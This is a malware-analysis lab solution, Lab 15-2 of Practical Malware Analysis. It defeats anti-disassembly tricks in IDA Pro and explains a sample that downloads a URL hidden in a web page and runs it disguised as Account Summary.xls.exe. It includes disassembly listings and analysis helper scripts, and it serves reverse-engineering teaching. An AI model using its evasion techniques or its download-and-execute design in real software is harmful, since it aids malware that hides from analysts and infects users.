Practical Malware Analysis by Andrew Honig. Published by No Starch Press, 2012.

Lab 15-2 Solutions

Short Answers

  1. The URL initially requested is http://www.practicalmalwareanalysis.com/bamboo.html.

  2. The User-Agent string is generated by adding 1 to each letter and number in the hostname (Z and 9 are rotated to A and 0).

  3. The program looks for the string Bamboo:: in the page it requested.

  4. The program searches beyond the Bamboo:: string to find an additional ::, which it converts to a NULL terminator. The string between Bamboo:: and the terminator is treated as a URL, and the content at that URL is downloaded to a file named Account Summary.xls.exe and executed.

Detailed Analysis

Open the binary with IDA Pro and scroll to the main function at address 0x00401000. We will disarm this function by reading it from top to bottom and fixing each countermeasure until we reach the logical end of the function. The first countermeasure we encounter, at address 0x0040115A, is shown in Example C-122.

Example C-122. False conditional

0040115A           test    esp, esp
0040115C           jnz     short near ptr loc_40115E+1 
0040115E
0040115E loc_40115E:                             ; CODE XREF: 0040115Cj
0040115E           jmp     near ptr 0AA11CDh 
0040115E ; ----------------------------------------------------------------------
00401163            db 6Ah
00401164            dd 0E8006A00h, 21Ah, 5C858B50h, 50FFFEFDh, 206415FFh, 85890040h
00401164            dd 0FFFFFD64h, 0FD64BD83h, 7400FFFFh, 0FC8D8D24h, 51FFFFFEh

The listing shows a false conditional used by the jnz instruction at 0x0040115C. The jump will always be taken because the value of ESP will always be nonzero at this point in the program. The ESP register is never explicitly loaded with a specific value, but it must be nonzero in any normally functioning Win32 application.

The target of the jump lies within the 5-byte jmp instruction at 0x0040115E. Turn this instruction into data by putting your cursor on 0x0040115E and pressing D on the keyboard. Then put your cursor on the jump target line 0x0040115F and press C to turn the line into code.

We continue reading the code until we encounter the anti-disassembly countermeasure at line 0x004011D0. This is a simple false conditional based on a jz following an xor eax, eax instruction. Correct this disassembly in the same fashion as in Lab 15-1 Solutions. Be sure to continue turning bytes into code so it reads clearly. Continue reading the code until you come to the next countermeasure at line 0x00401215, which is shown in Example C-123.

Example C-123. jmp into itself

00401215 loc_401215:                             ; CODE XREF: loc_401215j
00401215 EB FF           jmp     short near ptr loc_401215+1

At 0x00401215 is a 2-byte jmp instruction whose target is its own second byte. That second byte is also the first byte of the next instruction. Turn this instruction into data, put your cursor on the second byte at location 0x00401216, and turn it into code. To force IDA Pro to produce a clean graph, turn the first byte of the jmp instruction (0xEB) into a NOP. If you are using the commercial version of IDA Pro, select File ▸ Python command, enter PatchByte(0x401215, 0x90) into the text box, and click OK. Now put your cursor on location 0x00401215, which should contain the value db 90h, and convert it to code by pressing the C key.
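
The arithmetic behind a jmp into itself can be checked with a few lines of Python. This is a minimal sketch, not part of the lab; the helper name short_jump_target is made up for illustration. It relies only on the standard x86 rule that a short jump's 8-bit displacement is signed and is added to the address of the following instruction.

```python
def short_jump_target(address: int, rel8: int) -> int:
    """Return the destination of a 2-byte short jump located at `address`.

    The displacement byte is a signed 8-bit value that is added to the
    address of the next instruction (address + 2).
    """
    displacement = rel8 - 0x100 if rel8 >= 0x80 else rel8
    return address + 2 + displacement


# EB FF at 0x00401215: the displacement is -1, so the jump lands on the
# jmp's own second byte.
print(hex(short_jump_target(0x00401215, 0xFF)))

# 74 FA at 0x004012EC (Example C-125) follows the same rule.
print(hex(short_jump_target(0x004012EC, 0xFA)))
```

The same helper applies to any short conditional jump, because the displacement is encoded the same way whatever the condition.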

Continue reading the code until you reach the next countermeasure at line 0x00401269, which is shown in Example C-124.

Example C-124. False conditionals with the same target

00401269                 jz      short near ptr loc_40126D+1 
0040126B                 jnz     short near ptr loc_40126D+1 
0040126D
0040126D loc_40126D:                             ; CODE XREF: 00401269j
0040126D                                         ; 0040126Bj
0040126D                 call    near ptr 0FF3C9FFFh 

Example C-124 shows a false conditional built by placing both halves of a conditional branch back-to-back (at 0x00401269 and 0x0040126B) and pointing them at the same target. Because jz and jnz share a target, the countermeasure does not depend on the zero flag being either set or clear in order to reach the target code. In this case, the target is in the middle of the call instruction on line 0x0040126D. Convert this instruction to data by pressing the D key on the keyboard. Then put your cursor on line 0x0040126E and convert it to code with the C key.
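
To see why the jz/jnz pair behaves like an unconditional jump, the two branches can be modeled directly. The sketch below is illustrative only; the function names are invented, and the addresses are taken from Example C-124.

```python
TARGET = 0x0040126E        # loc_40126D+1, the shared jump target
FALL_THROUGH = 0x0040126D  # the bogus call that a disassembler shows


def takes_branch(mnemonic: str, zero_flag: bool) -> bool:
    """Return True when the conditional jump is taken for this ZF value."""
    if mnemonic == "jz":
        return zero_flag
    if mnemonic == "jnz":
        return not zero_flag
    raise ValueError(f"unsupported mnemonic: {mnemonic}")


def landing_address(zero_flag: bool) -> int:
    """Model jz at 0x00401269 followed by jnz at 0x0040126B."""
    for mnemonic in ("jz", "jnz"):
        if takes_branch(mnemonic, zero_flag):
            return TARGET
    return FALL_THROUGH  # never reached for a boolean flag


for flag in (True, False):
    print(flag, hex(landing_address(flag)))
```

Whichever value the zero flag holds, one of the two jumps fires, so the call at 0x0040126D is never executed as a call.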

Continue reading the code until you reach the next countermeasure at line 0x004012E6, which is shown in Example C-125.

Example C-125. False conditionals into the middle of the previous instruction

004012E6                loc_4012E6:                     ; CODE XREF: 004012ECj
004012E6 66 B8 EB 05                    mov     ax, 5EBh 
004012EA 31 C0                          xor     eax, eax
004012EC 74 FA                          jz      short near ptr loc_4012E6+2 
004012EE E8 6A 0A 6A 00                 call    near ptr 0AA1D5Dh

Example C-125 shows an advanced countermeasure that involves a false conditional jump into the middle of a previous instruction, as seen with the upward-jumping jz at 0x004012EC. This jumps into the middle of the mov instruction at 0x004012E6.

It is impossible to have the disassembler show all the instructions that are executed in this case because some bytes are executed twice, as part of two different instructions. Just follow the code logically and convert each instruction to code as you reach it. When you are finished with this countermeasure, it should look like the code in Example C-126. At 0x004012E8, we see the middle of the mov instruction from the previous listing converted to a proper jmp instruction.

Example C-126. Manually repaired anti-disassembly code

004012E6 66                             db 66h
004012E7 B8                             db 0B8h ; +
004012E8            ; ------------------------------------------------------------
004012E8
004012E8                loc_4012E8:               ; CODE XREF: 004012ECj
004012E8 EB 05                          jmp     short loc_4012EF 
004012EA            ; ------------------------------------------------------------
004012EA 31 C0                          xor     eax, eax
004012EC 74 FA                          jz      short loc_4012E8
004012EC            ; ------------------------------------------------------------
004012EE E8                             db 0E8h 
004012EF            ; ------------------------------------------------------------
004012EF
004012EF                loc_4012EF:              ; CODE XREF: loc_4012E8j
004012EF 6A 0A                          push    0Ah
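
The execution path through these overlapping bytes can be cross-checked with a tiny tracer. This is a rough sketch that decodes only the handful of opcodes appearing in Example C-125; it is not a general disassembler, and the function names are illustrative.

```python
BASE = 0x004012E6
# Bytes from Example C-125: mov ax, 5EBh / xor eax, eax / jz / call
CODE = bytes.fromhex("66B8EB05" "31C0" "74FA" "E86A0A6A00")


def signed8(value: int) -> int:
    """Interpret a byte as a signed 8-bit displacement."""
    return value - 0x100 if value >= 0x80 else value


def trace(start: int = BASE, max_steps: int = 16):
    """Follow execution from `start` and return (address, mnemonic) pairs."""
    pc, zero_flag, path = start, False, []
    for _ in range(max_steps):
        offset = pc - BASE
        opcode, operand = CODE[offset], CODE[offset + 1]
        if opcode == 0x66 and operand == 0xB8:      # mov ax, imm16 (4 bytes)
            path.append((pc, "mov ax, imm16"))
            pc += 4
        elif opcode == 0x31 and operand == 0xC0:    # xor eax, eax sets ZF
            path.append((pc, "xor eax, eax"))
            zero_flag = True
            pc += 2
        elif opcode == 0x74:                        # jz rel8
            path.append((pc, "jz"))
            pc = pc + 2 + (signed8(operand) if zero_flag else 0)
        elif opcode == 0xEB:                        # jmp rel8
            path.append((pc, "jmp"))
            pc = pc + 2 + signed8(operand)
        elif opcode == 0x6A:                        # push imm8: stop here
            path.append((pc, "push imm8"))
            break
        else:
            raise ValueError(f"unhandled opcode {opcode:#x} at {pc:#x}")
    return path


for address, mnemonic in trace():
    print(f"{address:08X}  {mnemonic}")
```

The trace visits 0x004012E8 as a jmp after it has already consumed those bytes as the operand of mov, and it never executes the 0xE8 byte at 0x004012EE.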

You can convert all the extra db bytes (like the one shown at 0x004012EE) to NOPs using the IDA Python PatchByte command described after Example C-123. This will allow you to create a proper function within IDA Pro. To create a function after patching in the NOPs, select all the code from the retn instruction on line 0x0040130E up to the beginning of the function at 0x00401000, and press the P key. To view the resulting function graphically, press the spacebar.
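
The effect of the NOP patching can be illustrated outside IDA Pro on a plain byte buffer. The sketch below is a stand-in for repeated PatchByte calls, not IDA code; the nop_out helper is hypothetical, and the buffer holds only the bytes shown in Example C-125.

```python
NOP = 0x90


def nop_out(image: bytearray, base: int, addresses) -> bytearray:
    """Overwrite each listed address with a NOP, as PatchByte(addr, 0x90) would."""
    for address in addresses:
        image[address - base] = NOP
    return image


BASE = 0x004012E6
image = bytearray.fromhex("66B8EB0531C074FAE86A0A6A00")

# The leftover db bytes in Example C-126: 66h, 0B8h and 0E8h.
nop_out(image, BASE, [0x004012E6, 0x004012E7, 0x004012EE])
print(image.hex())
```

Patching like this changes only the analysis copy of the code. It makes the listing readable for graphing rather than reproducing the original behavior exactly, since the junk bytes no longer execute as part of the mov.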

Two functions (sub_40130F and sub_401386) immediately follow the main function. Each builds a string on the stack, duplicates it to the heap with strdup, and returns a pointer to the heap string. The malware author crafted these functions to build the strings at runtime so that they do not show up as plaintext strings in the binary and appear only in memory. The first of these two functions produces the string http://www.practicalmalwareanalysis.com/bamboo.html, and the second produces the string Account Summary.xls.exe. Now that all the anti-disassembly countermeasures in the main function have been defeated, these functions should show cross-references to where they are called from the main function. Rename these functions buildURL and buildFilename by putting your cursor on the function name and pressing the N key on the keyboard.

Example C-127 shows the call to buildURL (our renamed function).

Example C-127. Opening the http://www.practicalmalwareanalysis.com/bamboo.html URL

0040115F                 push    0
00401161                 push    0
00401163                 push    0
00401165                 push    0
00401167                 call    buildURL
0040116C                 push    eax
0040116D                 mov     edx, [ebp+var_10114]
00401173                 push    edx
00401174                 call    ds:InternetOpenUrlA

Reading the code further, we see that it attempts to open the bamboo.html URL returned from buildURL by calling InternetOpenUrlA. To determine the User-Agent string used by the malware when calling InternetOpenUrlA, we first need to find the InternetOpenA call and determine what data is passed to it. Earlier in the function, we see InternetOpenA called, as shown in Example C-128.

Example C-128. Setting up the connection via InternetOpenA

0040113F                 push    0
00401141                 push    0
00401143                 push    0
00401145                 push    1
00401147                 lea     ecx, [ebp+name] 
0040114D                 push    ecx 
0040114E                 call    ds:InternetOpenA

The first argument to InternetOpenA, pushed at 0x0040114D, is the User-Agent string. ECX is pushed as this argument, and the lea instruction loads it with a pointer to a location on the stack. IDA Pro’s stack frame analysis has named this location name, as seen at 0x00401147. We must scroll up in the function to see where name is populated. Near the beginning of the function, shown in Example C-129, we see a reference to the name location at 0x0040104C.

Example C-129. Using gethostname to get the local machine’s name

00401047                 push    100h            ; namelen
0040104C                 lea     eax, [ebp+name] 
00401052                 push    eax             ; name
00401053                 call    ds:gethostname

The gethostname function will populate a buffer with the hostname of the local machine. Based on Example C-129, you might be tempted to conclude that the User-Agent string will be the hostname, but you would be only partially correct. In fact, careful examination of the code between locations 0x00401073 and 0x0040113F (not shown here) reveals a loop that is responsible for modifying each letter or number within the hostname by incrementing it by one before using it as the User-Agent. (The letter and number at the end, Z and 9, are reset to A and 0.)
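
The transformation is easy to reproduce when you need to predict the User-Agent for a known hostname, for example when writing a network signature. The following is a minimal sketch based on the description above, not a transcription of the loop. Leaving other characters unchanged and wrapping lowercase z to a are assumptions, and the function name is made up.

```python
def encode_hostname(hostname: str) -> str:
    """Shift every ASCII letter and digit up by one, wrapping Z->A and 9->0."""
    encoded = []
    for ch in hostname:
        if ch == "Z":
            encoded.append("A")
        elif ch == "z":              # assumption: lowercase wraps like uppercase
            encoded.append("a")
        elif ch == "9":
            encoded.append("0")
        elif ch.isascii() and ch.isalnum():
            encoded.append(chr(ord(ch) + 1))
        else:                        # assumption: other characters are untouched
            encoded.append(ch)
    return "".join(encoded)


# Hypothetical hostname used only for illustration.
print(encode_hostname("WIN-Z9A"))
```

Because the mapping is fixed, the hostname can also be recovered from a captured User-Agent by shifting each character back by one.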

Following the call to InternetOpenA and the first call to InternetOpenUrlA, the data (an HTML web page) is downloaded to a local buffer with a call to InternetReadFile, as shown in Example C-130 at 0x004011A3. The buffer that receives the data is the second argument, which IDA Pro has automatically named Str at 0x00401195. A few lines down in the function, we see the Str buffer accessed again at 0x004011DA.

Example C-130. Reading and parsing the downloaded HTML

0040118F                 push    eax
00401190                 push    0FFFFh
00401195                 lea     ecx, [ebp+Str] 
0040119B                 push    ecx
0040119C                 mov     edx, [ebp+var_10C]
004011A2                 push    edx
004011A3                 call    ds:InternetReadFile 
...
004011D5                 push    offset SubStr   ; "Bamboo::"
004011DA                 lea     ecx, [ebp+Str] 
004011E0                 push    ecx             ; Str
004011E1                 call    ds:strstr 

The strstr function at 0x004011E1 finds a substring within a larger string. In this case, it looks for the string Bamboo:: within the buffer Str, which contains all the data retrieved from the initial URL. The code immediately following the strstr call is shown in Example C-131.

Example C-131. Parsing a string separated by Bamboo:: and ::

004011E7                 add     esp, 8
004011EA                 mov     [ebp+var_108], eax 
004011F0                 cmp     [ebp+var_108], 0
004011F7                 jz      loc_401306
004011FD                 push    offset asc_40303C ; "::"
00401202                 mov     edx, [ebp+var_108]
00401208                 push    edx             ; Str
00401209                 call    ds:strstr 
0040120F                 add     esp, 8
00401212                 mov     byte ptr [eax], 0 
...
00401232                 mov     eax, [ebp+var_108]
00401238                 add     eax, 8 
0040123E                 mov     [ebp+var_108], eax

As you can see, the pointer to the string Bamboo:: found within the downloaded HTML is stored in var_108 at 0x004011EA. A second call to strstr, at 0x00401209, searches for the next ::. Once the two colons are found, the code at 0x00401212 replaces the first colon with a NULL, which terminates the string contained between Bamboo:: and ::.

The pointer stored in var_108 is incremented by eight at 0x00401238. This is exactly the length of the string Bamboo::, which is what the pointer references. After this operation, the pointer references whatever followed the colons. Since the code has already found the trailing colons and replaced the first of them with a NULL, var_108 now points to a proper NULL-terminated string holding whatever was between Bamboo:: and ::.
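
The parsing logic described above can be approximated in Python, which is handy for pulling the embedded value out of a captured copy of the page. This sketch follows the behavior described in the text rather than the listing instruction by instruction. Starting the search for the closing :: after the marker and returning None on failure are assumptions, and the sample page and URL are invented.

```python
from typing import Optional


def extract_between(page: str, marker: str = "Bamboo::",
                    terminator: str = "::") -> Optional[str]:
    """Return the text between `marker` and the next `terminator`, if any."""
    marker_index = page.find(marker)          # first strstr call
    if marker_index == -1:
        return None
    value_start = marker_index + len(marker)  # the add eax, 8 step
    value_end = page.find(terminator, value_start)
    if value_end == -1:                       # assumption: treat as not found
        return None
    return page[value_start:value_end]


# Hypothetical page content; example.com is a placeholder.
sample = "<html>Bamboo::http://example.com/payload::</html>"
print(extract_between(sample))
```

String slicing takes the place of writing a NULL terminator into the buffer, since Python strings carry their own length.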

Immediately following the string-parsing code, we see var_108 used at 0x0040124F in Example C-132.

Example C-132. Opening another URL in order to download more malware

00401247                 push    0
00401249                 push    0
0040124B                 push    0
0040124D                 push    0
0040124F                 mov     ecx, [ebp+var_108] 
00401255                 push    ecx
00401256                 mov     edx, [ebp+var_10114]
0040125C                 push    edx
0040125D                 call    ds:InternetOpenUrlA

The second argument (var_108) to InternetOpenUrlA is the URL to open. Therefore, the data between Bamboo:: and the trailing colons is intended to be a URL for the program to download. Analysis of the code between lines 0x0040126E and 0x004012E3 (not shown here) reveals that the content of the URL opened in Example C-132 is saved to the file Account Summary.xls.exe, which is then launched by a call to ShellExecute on line 0x00401300.